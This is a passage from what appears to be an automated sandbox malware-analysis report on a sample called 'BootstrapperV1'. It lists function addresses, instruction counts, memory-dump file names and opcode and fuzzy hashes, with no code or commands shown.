                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 8941f406fe49867915c1bdee5942fc73797bc15d22035e8206c4501f0b63fe92
                                                                                                                                                        • Instruction ID: 4d7b451405670246ae51b283d28c40cfffe340565964d80a7f79eae163b3f648
                                                                                                                                                        • Opcode Fuzzy Hash: 8941f406fe49867915c1bdee5942fc73797bc15d22035e8206c4501f0b63fe92
                                                                                                                                                        • Instruction Fuzzy Hash: C451F171E09A4A8FF759DB69D8593E87BA4FF55700F4041BAE00DD3292DE3898868B84
                                                                                                                                                        Function 00007FFAAC5A7520 Relevance: .2, Instructions: 169COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 3c8f91bda7087475d9493a855153813565a7b1755148edda8749624b1bce5ed8
                                                                                                                                                        • Instruction ID: 393a761bbd24ff8c6ec50c0fcb000088b9722ac0729c2bc5ec0898d749d67065
                                                                                                                                                        • Opcode Fuzzy Hash: 3c8f91bda7087475d9493a855153813565a7b1755148edda8749624b1bce5ed8
                                                                                                                                                        • Instruction Fuzzy Hash: A051002194EA86CFF365933988296B57BE9EF47740F1581FAE04EC71D3CD19A80A83D1
                                                                                                                                                        Function 00007FFAAC5A162F Relevance: .2, Instructions: 163COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 5e48bce73076cd4f542314cc19980a1eee4d75e50ba928f86017c872f51c2980
                                                                                                                                                        • Instruction ID: 4224dd248ef3555dea481acde57c5266df91f080af2ee20cb6cdc3be3873eca7
                                                                                                                                                        • Opcode Fuzzy Hash: 5e48bce73076cd4f542314cc19980a1eee4d75e50ba928f86017c872f51c2980
                                                                                                                                                        • Instruction Fuzzy Hash: AF415C61F1DA4ACFEB84EB7C94155B97BD2EF99710B0841FAE04DC3296DE289C0683C1
                                                                                                                                                        Function 00007FFAAC59F021 Relevance: .2, Instructions: 162COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: dd67c385c61c30dab55c8635d0c2816a1db4421d5b640eb68172f36a11a2df9a
                                                                                                                                                        • Instruction ID: 6c15fc59c1decc14e63238b2083eba0149b3ed78981352687f75542ce4b05dca
                                                                                                                                                        • Opcode Fuzzy Hash: dd67c385c61c30dab55c8635d0c2816a1db4421d5b640eb68172f36a11a2df9a
                                                                                                                                                        • Instruction Fuzzy Hash: 6841182071DA8A4FE798E76CD819AB57BD5EF9A310B0442FEE04EC7293DD1D9C468381
                                                                                                                                                        Function 00007FFAAC5990CA Relevance: .2, Instructions: 160COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 40b4dd9e2c6e1a9d636bd1d805e8d9e4a7116052af048396e1ff9a574c2575da
                                                                                                                                                        • Instruction ID: ad56bc2a40d3f825e2009c8d1280341cd3d6378fbbda5789d39eec799da7faab
                                                                                                                                                        • Opcode Fuzzy Hash: 40b4dd9e2c6e1a9d636bd1d805e8d9e4a7116052af048396e1ff9a574c2575da
                                                                                                                                                        • Instruction Fuzzy Hash: 9A41103174980E8FEBA4EB4CE498B6473E1FB9D361B1446F7E04DC7295D919DC458780
                                                                                                                                                        Function 00007FFAAC595A71 Relevance: .2, Instructions: 157COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 122d3083dda73d114c85669004dce309601d8ff80f9b050df278f72ed05c3e1e
                                                                                                                                                        • Instruction ID: 8d74804ecb2b584524df2ea9c0a526b95fa43c1f3de59039ae322cf439c9b294
                                                                                                                                                        • Opcode Fuzzy Hash: 122d3083dda73d114c85669004dce309601d8ff80f9b050df278f72ed05c3e1e
                                                                                                                                                        • Instruction Fuzzy Hash: 22416721A4DA4F8FEB98D72C945167577D6FF9A301B4482BAE00EC3286DD1DDC0643C1
                                                                                                                                                        Function 00007FFAAC596DFB Relevance: .2, Instructions: 154COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 80cbfd110167254e760d58d2553dde31ff4caee470b078a78473eb6b95171bcd
                                                                                                                                                        • Instruction ID: b039f9104d5470eb3e99d83a2c9111f11bacbd77105800496c7ce107212f7515
                                                                                                                                                        • Opcode Fuzzy Hash: 80cbfd110167254e760d58d2553dde31ff4caee470b078a78473eb6b95171bcd
                                                                                                                                                        • Instruction Fuzzy Hash: 1D416E97A0DA9B8FF656E36CA8A51F67BD4EF5221070882B7E04DC6293DC0D980E42C1
                                                                                                                                                        Function 00007FFAAC599259 Relevance: .1, Instructions: 148COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: dd42f0562deb497b8ca0859927e93adc1f753361ac27eacdebcb091f11a340d9
                                                                                                                                                        • Instruction ID: 064198c40d4cf39bcbfc3a90f96c0c168ee0c015ce7d87bee1e54edf58f0da3c
                                                                                                                                                        • Opcode Fuzzy Hash: dd42f0562deb497b8ca0859927e93adc1f753361ac27eacdebcb091f11a340d9
                                                                                                                                                        • Instruction Fuzzy Hash: E6412963A4D2968BE711B77CA8265E43B90DF46335B08C2F7D0CDCF1A3DC09644A82D2
                                                                                                                                                        Function 00007FFAAC59D228 Relevance: .1, Instructions: 147COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 9a8529f93d6c132908caa840bbc410733667681dfb4bb16e7d89ab2f6745c043
                                                                                                                                                        • Instruction ID: a263a5d8171c1a3bb0a282a0955753c367bbd5f169aecf611886485f5be64da5
                                                                                                                                                        • Opcode Fuzzy Hash: 9a8529f93d6c132908caa840bbc410733667681dfb4bb16e7d89ab2f6745c043
                                                                                                                                                        • Instruction Fuzzy Hash: 74412953A4D6968BEB55A76CE8651F53FA4DF97321708C1F3E08CCE293DC09984A83A1
                                                                                                                                                        Function 00007FFAAC59DC60 Relevance: .1, Instructions: 146COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 7d0f63abffe3e09215166ecdcc540096cf4723c9f0c313c810f5faa46533c2f3
                                                                                                                                                        • Instruction ID: 29a566221ee355953c9d5bb3bea71ee337a8d9fdefbfb317ce8d265f336fc311
                                                                                                                                                        • Opcode Fuzzy Hash: 7d0f63abffe3e09215166ecdcc540096cf4723c9f0c313c810f5faa46533c2f3
                                                                                                                                                        • Instruction Fuzzy Hash: 6941B53065DA4A8FEB55EB3CC054E7177D5EF56300B0485F9D04ECB2A6CD2AE849CB80
                                                                                                                                                        Function 00007FFAAC5A4CDA Relevance: .1, Instructions: 145COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 8ed0329abe4e3e7d33c788d05ac0e995aae846237a2480e9b0513a48fb98af2a
                                                                                                                                                        • Instruction ID: d7799a7ef7601810b10530ba6a1dc2b8e7fd13875f1dc0e2057270b8581facd1
                                                                                                                                                        • Opcode Fuzzy Hash: 8ed0329abe4e3e7d33c788d05ac0e995aae846237a2480e9b0513a48fb98af2a
                                                                                                                                                        • Instruction Fuzzy Hash: 19411861A4E7C64FE396D77C44296647FE1EF47650B0981FBE08DCB1A3DE188C0A8392
                                                                                                                                                        Function 00007FFAAC5909FF Relevance: .1, Instructions: 145COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 70ea8cb0d3f2377f7dcce32e9f7f2d6d55c273fbdfd52b2d9e5dfa1350e9210e
                                                                                                                                                        • Instruction ID: 27971b400ecae0fa28c762fdf2254a06d37b2488eeb6fd85f8e9e9c9c26190ee
                                                                                                                                                        • Opcode Fuzzy Hash: 70ea8cb0d3f2377f7dcce32e9f7f2d6d55c273fbdfd52b2d9e5dfa1350e9210e
                                                                                                                                                        • Instruction Fuzzy Hash: 7241B570A1DA8A8FEB45FBB8C4156ADBBE0EF5A310F0445BDD00EC7293DE2C98458781
                                                                                                                                                        Function 00007FFAAC5A5B40 Relevance: .1, Instructions: 142COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: a3f3fae902b0b8c77fc92ed2d16ced5a3828272c5227507606823f5ea2ceb5d2
                                                                                                                                                        • Instruction ID: 31c9a99814ee6f8ad4bf8560471f89ed4111322ee8d208eb64ed4a887a3c1b38
                                                                                                                                                        • Opcode Fuzzy Hash: a3f3fae902b0b8c77fc92ed2d16ced5a3828272c5227507606823f5ea2ceb5d2
                                                                                                                                                        • Instruction Fuzzy Hash: 86412470A59E068FEB58D739D459AA5B3D1FF95300F40857DE08EC3295DE29F886C780
                                                                                                                                                        Function 00007FFAAC598478 Relevance: .1, Instructions: 142COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: a05565cd88a309a7757fad987afc0d2e00b6af700aa33711d22accb078ab5b61
                                                                                                                                                        • Instruction ID: dd1accbc7baee4128c3d9bb7cd7a5846265f9f061bc910a98ce2d7594182e5e1
                                                                                                                                                        • Opcode Fuzzy Hash: a05565cd88a309a7757fad987afc0d2e00b6af700aa33711d22accb078ab5b61
                                                                                                                                                        • Instruction Fuzzy Hash: 80314423A18A5B8FF394DB2CE8092B977C4EB96350F0541BBE44EC7291DE1DE88643C5
                                                                                                                                                        Function 00007FFAAC5A44A1 Relevance: .1, Instructions: 131COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 1bae3380cce603e00dcbf3d4cbfaa9995a5ffa1bd4e046c2b7ca86583193d820
                                                                                                                                                        • Instruction ID: 35d2caeb477f3fa4a605324e159599afe94ab0f31d62e131f9ea388567746cc7
                                                                                                                                                        • Opcode Fuzzy Hash: 1bae3380cce603e00dcbf3d4cbfaa9995a5ffa1bd4e046c2b7ca86583193d820
                                                                                                                                                        • Instruction Fuzzy Hash: 3B316761A5EBC68FF79593B958696707FC1EF5B61030940FAE48CC71B7DE089C0A8382
                                                                                                                                                        Function 00007FFAAC5914E1 Relevance: .1, Instructions: 129COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 8fe91020d6b6fabe39069aecd3f77946162751f10c1d7279821f5eef13982d09
                                                                                                                                                        • Instruction ID: 3e78521d7c320595f28f26d8dde5be4b4ace9fb6fd1302e56386379b5ec608e4
                                                                                                                                                        • Opcode Fuzzy Hash: 8fe91020d6b6fabe39069aecd3f77946162751f10c1d7279821f5eef13982d09
                                                                                                                                                        • Instruction Fuzzy Hash: 6641B231A1994A8FEB95E76884157EABBE0EF59310F0440F9E10EC72A2CE6D9845CBC1
                                                                                                                                                        Function 00007FFAAC592C98 Relevance: .1, Instructions: 125COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: d41cd992e5001a3567b700aa3e747f3907e5f28639179ced304f912c3d3b19ce
                                                                                                                                                        • Instruction ID: 61c31da14104c88164a1bdeffeee754b553962e3643ac60d38c27550a85bbde0
                                                                                                                                                        • Opcode Fuzzy Hash: d41cd992e5001a3567b700aa3e747f3907e5f28639179ced304f912c3d3b19ce
                                                                                                                                                        • Instruction Fuzzy Hash: EE31CE31B0991E8FEB98EB5C98497B973D6FB99310F0440BAF40ED3295CE299C0543C5
                                                                                                                                                        Function 00007FFAAC5A4C50 Relevance: .1, Instructions: 125COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 44e7dc27ff344484c1d7eab7f2d26052ab655edfb8675cb9a3b825661f486248
                                                                                                                                                        • Instruction ID: 520a8677e5306de056c17d8db83b45248a9a827f5e950217f7ace28ba9d984ea
                                                                                                                                                        • Opcode Fuzzy Hash: 44e7dc27ff344484c1d7eab7f2d26052ab655edfb8675cb9a3b825661f486248
                                                                                                                                                        • Instruction Fuzzy Hash: C6312D2164EBC64FE756D77898696743FE4EF53250B0981EBE48DCB1E3DE088C098392
                                                                                                                                                        Function 00007FFAAC5948ED Relevance: .1, Instructions: 120COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 6920e99b4ebd04d58dd588d4bbb691b92221979c1f72ec432a0a809b67aa8870
                                                                                                                                                        • Instruction ID: 039cfd7591df435241da3373e4bd15b453408f676a03b8cfcb9779c12ccd8591
                                                                                                                                                        • Opcode Fuzzy Hash: 6920e99b4ebd04d58dd588d4bbb691b92221979c1f72ec432a0a809b67aa8870
                                                                                                                                                        • Instruction Fuzzy Hash: 2D31A030659A1ACBE758AB29C088AB573D9FF9A740F50817DE05FC3291CE25F84687C4
                                                                                                                                                        Function 00007FFAAC593F69 Relevance: .1, Instructions: 115COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: fe5406c65e8f3da11731958a059420feb9f089e056af3b76170d2e7c9b04377c
                                                                                                                                                        • Instruction ID: d2d35ac47933375fa7a33e7d2cbb8c2a1a7d0a78983b21671d4f179bcf78bf6a
                                                                                                                                                        • Opcode Fuzzy Hash: fe5406c65e8f3da11731958a059420feb9f089e056af3b76170d2e7c9b04377c
                                                                                                                                                        • Instruction Fuzzy Hash: F531A6318CE2825FE3064324AC575F27BA89B43325B1A41E7E05DCB9E3C90E6597C3A2
                                                                                                                                                        Function 00007FFAAC5AF271 Relevance: .1, Instructions: 115COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 330ee3e0ec07524533daba051aced2823e26095b73bf98a70746be2b58ceb629
                                                                                                                                                        • Instruction ID: f046bf374e38ff0ed908f0b60584788d75ee3b802f520b94a6c229d30ac55103
                                                                                                                                                        • Opcode Fuzzy Hash: 330ee3e0ec07524533daba051aced2823e26095b73bf98a70746be2b58ceb629
                                                                                                                                                        • Instruction Fuzzy Hash: 3F31B22165EA868FE791A3BC44153EABBE1EF96350F0841B6D08CC7192DA6D9C4A83D1
                                                                                                                                                        Function 00007FFAAC5997E0 Relevance: .1, Instructions: 114COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: a746c7eadd3795ee26401dce0f0d0c58a1433a7ec29313e2a20f64c3eb32e8c8
                                                                                                                                                        • Instruction ID: d7bd7833dfa2a4123b3d264300395b282209846c994b4fb0efa2958598db6094
                                                                                                                                                        • Opcode Fuzzy Hash: a746c7eadd3795ee26401dce0f0d0c58a1433a7ec29313e2a20f64c3eb32e8c8
                                                                                                                                                        • Instruction Fuzzy Hash: 0F21F621759D0F8FFBD8E61C946567923C6EBDA351B5480BAE40EC3286DE2AEC4643C0
                                                                                                                                                        Function 00007FFAAC598270 Relevance: .1, Instructions: 114COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 1e6f7f8f480348d2a906b2a2aef42b444d50d7f86d85e8d51dde2535865e4d40
                                                                                                                                                        • Instruction ID: 29df34ae059bdad8b0bfcab16092d5689d904e9632b3759848075a00bd55077b
                                                                                                                                                        • Opcode Fuzzy Hash: 1e6f7f8f480348d2a906b2a2aef42b444d50d7f86d85e8d51dde2535865e4d40
                                                                                                                                                        • Instruction Fuzzy Hash: B8315321A9E6866FF355A7B848065E9BBC1EF173A0B4800FDE04EC7193EC5D9C4A8391
                                                                                                                                                        Function 00007FFAAC5A4DCD Relevance: .1, Instructions: 112COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 7f0f75dbdb6b69fd032685279fcb4063afa6048213f01c37461fcb2f9aa4d930
                                                                                                                                                        • Instruction ID: e7029ccef0cf3050399fbb459484cc84fde912bfa1e8c0370bfcf2a3873f0545
                                                                                                                                                        • Opcode Fuzzy Hash: 7f0f75dbdb6b69fd032685279fcb4063afa6048213f01c37461fcb2f9aa4d930
                                                                                                                                                        • Instruction Fuzzy Hash: 8E31F751A0EBCA4FE796977844692643FE1EF47550B0981FBE08DCB1A3DE149C098392
                                                                                                                                                        Function 00007FFAAC5949F2 Relevance: .1, Instructions: 110COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 2287817b161e2aee761ea62f01c148eb48aeb79595203244c0e8fb89677df120
                                                                                                                                                        • Instruction ID: 2aa63265755cf73c3ec1c9ef81c4e8428550b55d5554531dab364eb52aedde96
                                                                                                                                                        • Opcode Fuzzy Hash: 2287817b161e2aee761ea62f01c148eb48aeb79595203244c0e8fb89677df120
                                                                                                                                                        • Instruction Fuzzy Hash: C631B031A0AA598FEB95DB5C98596A87BE5EB5A300F0401E6E40CD7292CE199C0883C1
                                                                                                                                                        Function 00007FFAAC59109D Relevance: .1, Instructions: 109COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 4698056ace45a03a3f35f90dddef1356b54a083763d4b45571d7eb5fb5898982
                                                                                                                                                        • Instruction ID: 03b5e3381e969d57dee46b17663b0273b9d3295c03f759b9b5996ad4f20a5b20
                                                                                                                                                        • Opcode Fuzzy Hash: 4698056ace45a03a3f35f90dddef1356b54a083763d4b45571d7eb5fb5898982
                                                                                                                                                        • Instruction Fuzzy Hash: D731A95048F3C21FE7A347B499655923FEA9D87520B0E81EBE5C8CE4A7D58E484AC363
                                                                                                                                                        Function 00007FFAAC597DFB Relevance: .1, Instructions: 106COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
